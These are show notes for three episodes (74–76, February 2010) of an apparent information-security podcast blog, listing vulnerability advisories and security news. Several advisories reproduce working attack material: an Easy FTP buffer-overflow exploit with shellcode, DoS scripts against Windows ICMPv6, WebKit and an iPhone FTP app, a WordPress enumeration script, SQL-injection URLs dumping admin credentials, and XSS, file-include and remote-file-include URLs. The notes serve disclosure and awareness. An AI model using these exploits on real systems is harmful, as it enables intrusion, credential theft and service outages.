2010
02.26

Episode 76 – Don’t Spy on Me!

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 76 for February 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

OuterZ0ne:

  • Outerz0ne March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellseley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com) 1377 Virginia Avenue, Atlanta, GA 30344 (404) 762-5111
  • The next DC404 meeting will be at Outerz0one

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. Microsoft Windows TCP/IP ICMPv6 Router protocol implementation is subject to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. The following commands using the Scapy6 packet manipulation program can trigger this issue and cause a denial-of-service condition:v6_dst = “<IPv6 address>”

    mac_dst = “<Mac address>”

    pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix=”2001::”) / Raw(load=’A'*2008)

    l=fragment6(pkt, 1500)

    for p in l:
    sendp(Ether(dst=mac_dst)/p, iface=”eth0″)

  2. GNU Libtool is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Versions prior to Libtool 2.2.6b are vulnerable. An attacker can exploit this issue by enticing an unsuspecting administrator to run ‘libtool’ from the directory where a malicious module is stored.
  3. The APC Network Management Card is subject to multiple cross-site request-forgery and cross-site scripting vulnerabilities. An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. Versions prior to the following are vulnerable:
    Network Management Card Firmware 3.7.2 and Network Management Card Firmware 5.1.1. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URL: http://www.sample.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  4. WorkSimple is subject to a shell upload and password disclosure vulnerability.  Version 1.3.2 is vulnerable, though other versions may be as well.  Exploit code is available:
    Password Disclosure Vulnerability:

    http://www.sample.com/Path/data/secret.php

    Remote File Upload Vulnerability:
    file :/modules/uploader.php?startupload
    array(“.phps”,”.txt”,”.html”,”.png”
    , “.html”, “.htm”,”.jpg”,”.png”,
    “.bmp”,”.c”,”.cpp”, “.css”,
    “.h”, “.gif”, “.torrent”,
    “.jpeg”);

    <form enctype=’multipart/form-data’
    action=’[SITE]/modules/uploader.php?startupload’ method=’post’>
    <input type=’hidden’ name=’MAX_FILE_SIZE’ value=’500000′ />
    Upload a file: <input name=’uploadedfile’ size=’14′ type=’file’ />
    <BR><BR>
    <input class=’button’ type=’submit’ value=’upload’ />
    </form>

Stories of Interest:
News item 1: http://www.technologyreview.com/computing/24632/?a=f
Researchers at SRI International and Georgia Tech are preparing to release a free tool to stop “drive-by” downloads: Internet attacks in which the mere act of visiting a Web site results in the surreptitious installation of malicious software. The new tool, called BLADE (Block All Drive-By Download Exploits), stops downloads that are initiated without the user’s consent.

In the fourth quarter of 2009, roughly 5.5 million Web pages contained software designed to foist unwanted installs on visitors, according to Dasient, a firm that helps protect websites from Web-based malware attacks. Such drive-by downloads target computers that are not up-to-date with the latest security patches for common Web browser vulnerabilities, or are missing security updates for key browser plug-ins, such as Adobe’s PDF Reader and Flash Player. Attackers use software called exploit packs, which probe the visitor’s browser for known security holes.
The research group has been putting BLADE through the paces since January, exposing a few virtual desktops equipped with the software to new exploit sites identified each day by security experts. Each malicious URL is tested against multiple software configurations covering different browser versions and common plug-ins.

News item 2: http://sanfrancisco.bizjournals.com/sanfrancisco/stories/2010/02/22/daily2.html

VeriSign Inc. said 11 million new domain names were registered in the fourth quarter of 2009, pushing the total number to 192 million at year’s end. At the end of the third quarter, there were 187 million registered domain names. That was up from 177 million at the end of 2008. That works out to about 3.7 million new registrations per month in the fourth quarter, the Mountain View business, which tracks such things, said. New registrations for the .com and .net domains were about 2.4 million per month in the fourth quarter.

The renewal rate in the fourth quarter was 71 percent, about the same as it was in the fourth quarter of 2008. At the end of 2009, domain name registrations were up 15 million from the end of 2008.

News item 3: http://www.virusbtn.com/news/2010/02_22.xml
Despite widespread calls to boycott IE 6 and Microsoft’s plans to retire support for the browser, 19% of respondents in a Virus Bulletin poll said that they are still running the browser, whether at home, at work, or both. In VB’s poll, 15% of respondents said they were running the browser at work, indicating that, for many organizations, upgrading is not a priority.
http://www.virusbtn.com/news/polls/index?id=43

Are you still running IE 6?

(February 2010)

Yes, on my machine at work
12%

Yes, on my home machine
4%

Yes, on both work and home machines
3%

No, I use a newer version of IE
26%

No, I use a different browser
55%

News item 4: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000.

Karen McCarthy, owner of Merrick, N.Y. based Little & King LLC, a small promotions company, discovered on Monday, Feb. 15 that her firm’s bank account had been emptied the previous Friday. McCarthy said she immediately called her bank – Cherry Hill, N.J. based TD Bank – and learned that between Feb. 10 and Feb. 12, unknown thieves had made five wire transfers out of the account to two individuals and two companies with whom the McCarthys had never had any prior business.

“She was told to go to the branch next day, and she did, and the people at the branch were very nice, apologetic, and said, ‘Whatever happened, we’ll replace it,’” Karen McCarthy’s husband Craig said. “She called them up on Wednesday, and they gave her the runaround. Then she finally got to talk to someone and they said ‘We don’t see the error on our side.’”

Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer.

Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash.

News item 5: http://www.myanmarnews.net/story/605416
A Latvian computer hacker has been leaking secret bank details to a local TV station. In Riga, data about the finances of banks and state-owned firms has been shown on Latvian TV, thanks to the hacker who uses the alias “Neo.” With Latvia suffering badly in the global recession, Neo has claimed he wants to expose those cashing in on the recession in Latvia, and has already revealed embarrassing pay details of bank managers and leading Latvian firms. So far, he has managed to leak the pay details of managers from one Latvian bank that received a bail-out, revealing they did not take salary cuts as promised. Other data shows that state-owned companies secretly awarded bonuses when still requesting help from the government. While police are now looking for the hacker, who has committed computer crime, the public appears to be generally on his side, as he continues to disclose embarrassing information.

News item 6:  http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx

Waledac, has been stopped in its tracks after Microsoft got a court to issue a secret temporary restraining order. The restraining order took 277 domain names used by the criminals to communicate with the botnet offline. Without these domain names, it is hoped that the controllers of the botnet will permanently lose access to the machines running their malware.

The Waledac botnet is presumed to be run by Eastern Europeans and to be made up of hundreds of thousands of compromised machines. It sends hundreds of millions, if not billions, of e-mails each day, as well as distributes malware to help recruit new machines to the network. Microsoft’s complaint describes in detail how the botnet is organized, with a complex hierarchical control system. At the root of the system is the command-and-control servers. The botnet uses the 277 domain names to connect to the command and control servers to download new commands. These commands are then distributed through the different tiers of the network using peer-to-peer transmission.

News item 7: http://www.computerworld.com/s/article/9162498/Researchers_question_Microsoft_s_botnet_take_down?source=rss_news

A prominent security researcher today said he doubts Microsoft’s take-down of the Waledac botnet would have any impact on spam levels, as the company claimed.

“Waledac just is not a hugely prolific spammer,” said Joe Stewart, director of malware analysis at SecureWorks and a noted botnet researcher. “So I don’t think it’s going to affect spam [volume]. What it does do lately…, what it’s used for, is to install rogue antivirus software.”

The U.K.-based anti-spam service Spamhaus echoed Stewart today. “If [Microsoft's take-down] did affect spam, we haven’t noticed,” said Richard Cox, the chief information officer at Spamhaus. Like Stewart, Cox also dismissed Waledac’s threat as a spam engine.

News item 8:  http://www.newsnet5.com/dpp/news/national/Copy_of_PATeen-Hacker_98726384

A 17-year-old honor student from western Pennsylvania has entered the equivalent of a guilty plea to four felony charges in juvenile court for using a computer virus to crash a Sony Entertainment Corp. gaming Web site.

The charges grew out of a federal grand jury investigation in San Diego, but authorities agreed to let the charges be handled by Westmoreland County Juvenile Court because of the boy’s age.

Police in Greensburg, Pa. said the boy used his computer skills to cripple Sony’s PlayStation site for 11 days in November 2008 after he was barred from it for cheating while playing a war game against others online.

News item 9:  http://www.wired.com/threatlevel/2010/02/military-spied-on-plannet-parenthood/

The U.S. military monitored Planned Parenthood and a white supremacist group as part of the government’s security preparations for the 2002 Olympics in Utah, according to new documents released by the Department of Defense.

The U.S. Joint Forces Command liaison collected and disseminated information on U.S. citizens who were members of Planned Parenthood and the white supremacist group National Alliance regarding their involvement in protests and distributing literature, according to an intelligence-oversight report released by the Pentagon. The documents indicate that the JFC liaison was working with the FBI’s Olympic Intelligence Center at the time.

This and other intelligence-activity disclosures appear in heavily redacted documents that were released to the Electronic Frontier Foundation. They came in response to an ongoing Freedom of Information Act project the organization is conducting to obtain oversight information from intelligence agencies.

EFF received more than 800 pages from intelligence oversight reports created by the Defense Department inspector general that examine actions, conducted by various branches of the department, that are believed to be illegal.
A document from a 2008 oversight report indicates that Army Cyber Counterintelligence officers attended a Black Hat security conference without disclosing their Army affiliation. The conference, held annually in Las Vegas and Washington, D.C., attracts hackers and security professionals from around the world. It’s also a hotbed gathering for undercover law enforcement and intelligence agents from around the world who come to learn about the latest computer security vulnerabilities and what specific hackers are up to. The documents don’t indicate if the officers collected any information on conference attendees.

News item 10: http://cellphones.org/privacy/

2010
02.25

Episode 75 – “Zipit, Zipit Good”

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 75 for February 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected.
    #!/usr/bin/python
    #greetz to my blackhatz and baycatz
    #iPhone CSS::Selector crash
    #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy

    import sys, socket;

    def main():
    junk = “*>” * 120000;

    html = “”"
    <html>
    <head>
    <style>
    “”";

    html += junk;

    html += “”"
    body {background: blue;}
    </style>
    </head>
    </html>
    “”";

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    s.bind((”,2121));
    s.listen(1);

    while True:
    channel, details = s.accept();
    print channel.recv(1024);
    channel.send(html);
    channel.close();

    main();

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.  Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:
    javascript:document.cookie=”installerFile=[FIle];path=’/upload/admin/plugins’

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available: http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3

    ,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected.#!/usr/bin/python
    #
    # Title: iPhone – FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn’t crash at all, but after exploiting it
    # you can’t see (list) your files anymore. You must to close the app
    # and open it again. Then you’ll see that the app starts like it was
    # fresh installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone – FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting…
    # [+] 220 Service ready.
    #
    # [+] Sending username…
    # [+] Sending buffer…
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    crash = “\x41″ * 1000

    def Usage():
    print (“Usage: ./free_ftp.py serv_ip\n”)
    if len(sys.argv) <> 2:
    Usage()
    sys.exit(1)
    else:
    host = sys.argv[1]
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    print “\n[+] FTP Server by SavySoda(WiFi FTP).”
    print “[+] Free version of WiFi FTP with Ad Support.\n”
    print “[+] Connecting…”
    s.connect((host, 21))
    b=s.recv(1024)
    print “[+] ” +b
    except:
    print (“[-] Can’t connect to ftp server!\n”)
    sys.exit(1)
    print “[+] Sending username…”
    time.sleep(3)
    s.send(‘USER anonymous\r\n’)
    s.recv(1024)
    print “[+] Sending buffer…”
    time.sleep(3)
    s.send(‘APPE ‘ + crash + ‘\r\n’)
    s.recv(1024)
    s.close()
    print “[+] done!\n”
    sys.exit(0);

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials; Upload arbitrary PHP scripts and run them in the context of the webserver; Compromise the application and the underlying system; Hijack a user’s session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:
    File upload:
    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&amp;which=&lt;img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)&gt;

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?

News Items of Interest:
News item 1:http://www.newsweek.com/id/233916

There is no doubt about the fact that real time or historical tracking of criminals’ movement via their cell phones can come really handy to law enforcement officers. It is certain that most of them – if not all – would like to avail themselves of this opportunity in order to gain helpful information to aid them in their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But, some magistrates in New York, Pennsylvania, and Texas haven’t been that forthcoming and refused to sign such requests, not being convinced about their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report come out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a followup post linked to Ars Technica’s robust deconstruction of that claim. Now the story gets weird: Fred Flowers writes
The original story quoted the company’s CTO, Craig Barth on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr’s blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr’s post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

2010
02.24

Episode 74 – iBoobs

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 74 for February 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable.  The following exploit code is available:
    #/usr/bin/python
    #
    # WordPress > 2.9 Failure to Restrict URL Access PoC
    #
    # This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
    # If the requests differ a ‘Trash’ post has been found.
    #
    # You will need an authenticated user cookie of any priveledge to run this script.
    #
    # Example cookie:
    # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
    #
    # Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
    #
    #
    # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

    import httplib

    # Declare vars
    blogURL = “www.example.com”
    userCookie = “enter_cookie_here”
    postID = 0 #Leave at 0

    conn = httplib.HTTPConnection(blogURL)
    Headers = {“Cookie” : userCookie}

    print
    print “Target = http://” + blogURL + “/?p=” + str(postID)
    print

    while 1:

    # Start non authenticated enumeration

    request = ‘/?p=’ + str(postID)
    conn.request(“GET”, request, “”)

    try:
    r1 = conn.getresponse()
    except:
    print “Connection error”

    data1 = r1.read()

    # Start authenticated enumeration

    conn.request(“GET”, request, None, Headers)

    try:
    r2 = conn.getresponse()
    except:
    print “Connection error”

    data2 = r2.read()

    # Compare the HTML body reponses

    if data1 != data2:
    print “+ Found! http://” + blogURL + request
    else:
    print request

    postID += 1

    conn.close()

  2. UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
    #!/usr/bin/python

    # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
    # From: The eh?-Team || The Great White Fuzz (we’re not sure yet)
    # Author: dookie2000ca
    # Date: 14/02/2010
    # Found by: loneferret
    # Date Found: 13/02/2010

    # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
    # Tested on: Windows XP SP3 Professional

    import socket
    import sys

    # msfpayload windows/exec cmd=calc.exe R | msfencode -b ‘\x00\x0a\x2f\x5c’ -e x86/shikata_ga_nai -t c
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)

    shellcode = (“\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93″
    “\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f”
    “\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04″
    “\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb”
    “\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e”
    “\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6″
    “\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21″
    “\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11″
    “\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a”
    “\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5″
    “\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21″
    “\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69″
    “\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36″
    “\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5″
    “\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b”
    “\x1b\x35\x1d”)

    sled = “\x90″ * 10
    filler = “\x90″ * 30
    eip = “\x8B\x38\xAB\x71″ # 71AB388B JMP EBP WS2_32.DLL
    trailer = “\x43″ * 48

    evil = sled + shellcode + filler + eip + trailer

    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect((’192.168.1.142′,21))
    s.recv(1024)
    s.send(‘USER dookie\r\n’)
    s.recv(1024)
    s.send(‘PASS dookie\r\n’)
    s.recv(1024)
    s.send(‘MKD ‘ + evil + ‘\r\n’)
    s.recv(1024)
    s.send(‘QUIT\r\n’)
    s.close

  3. Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.  Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory.  The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20.  An attacker can exploit this issue by deploying a malicious WAR file.
  4. FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability.  A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
  5. Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3.  Local attackers can use readily available commands to exploit this issue.
  6. The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL:  http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
  7. PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
    // overlong UTF-8 sequence
    echo htmlspecialchars(“A\xC0\xAF&”, ENT_QUOTES, ‘UTF-8′);
    // invalid Shift_JIS sequence
    echo htmlspecialchars(“B\x80&”, ENT_QUOTES, ‘Shift_JIS’);
    echo htmlspecialchars(“C\x81\x7f&”, ENT_QUOTES, ‘Shift_JIS’);
    // invalid EUC-JP sequence
    echo htmlspecialchars(“D\x80&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“E\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“F\x8E\xFF&”, ENT_QUOTES, ‘EUC-JP’);
    echo htmlspecialchars(“G\x8F\xA1\xFF&”, ENT_QUOTES, ‘EUC-JP’);

News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469

Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.

In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.

“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”

Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.

News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html

Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks.  The program is used to download the company’s two most popular products, Adobe Reader and Flash Player.  The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.

Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.

“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.

Download Manager is not the update mechanism for Reader and Flash Player – that’s called Adobe Updater – but instead oversees file transfers from Adobe’s site

News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed.  The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao.  Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law.  Foundem claims that its site is demoted in Google’s search results.  “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.

Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.

News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
According to Kelly Jackson Higgins, attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.

The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.

Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.

Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.

News item 5: http://www.scmagazineus.com/ftc-notifies-100-organizations-about-p2p-leaks/article/164288/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29

The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.

FTC Chairman Jon Leibowitz said in a statement. “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.”  The FTC on also released educational materials for businesses about the risks of P2P networks and ways to manage them.

News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.

Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.

Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
